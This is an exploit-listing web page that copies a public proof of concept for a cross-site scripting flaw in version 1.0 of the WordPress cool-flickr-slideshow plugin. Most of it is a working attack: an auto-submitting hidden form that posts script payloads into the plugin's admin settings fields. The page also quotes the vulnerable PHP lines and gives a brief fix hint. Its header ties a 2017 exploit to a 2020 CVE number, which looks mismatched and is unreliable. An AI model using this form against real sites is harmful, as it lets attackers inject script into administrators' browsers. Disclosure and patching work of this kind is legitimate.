Advertisement






Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)

CVE Category Price Severity
CVE-2020-12800 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-09-07
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090043

Below is a copy:

Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss) ___________________________________________________
|
| Exploit Title: Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage:https://wordpress.org/plugins/cool-flickr-slideshow/
| Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip
| Version: 1.0
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

 Exploit :
 
<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings">
<input type="hidden" name="flickr-gallery_hidden" value="Y" />
<input type="hidden" name="flickr_type" value=""><script>alert("xss1")</script>" />
<input type="hidden" name="flickr_uid" value="1" />
<input type="hidden" name="flickr_api" value="MMM" />
<input type="hidden" name="flickr_groupid" value='1' />
<input type="hidden" name="flickr_set" value="" />
<input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="Submit" value="Save" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>

__________________________________________________


 Vulnerable File :
     /wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php

 Vulnerable code:
 
 
line 154 :
<select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);">
       <option selected="" value=""/><script>alert(1000)</script>">SELECT</option>      
                                          <option value="user">User</option>                                         
                                          <option value="group">Group</option>
                                          <option value="set">Set</option>     
                                          <option value="api">API</option>                                    
                             
                  </select>
  
line 185 :
<p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?>
</span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p>


line 186 :
<p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?>
</span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p>
  
  
__________________________________________________

#patch:
For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________

Discovered By : M.R.S.L.Y 
__________________________________________________



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.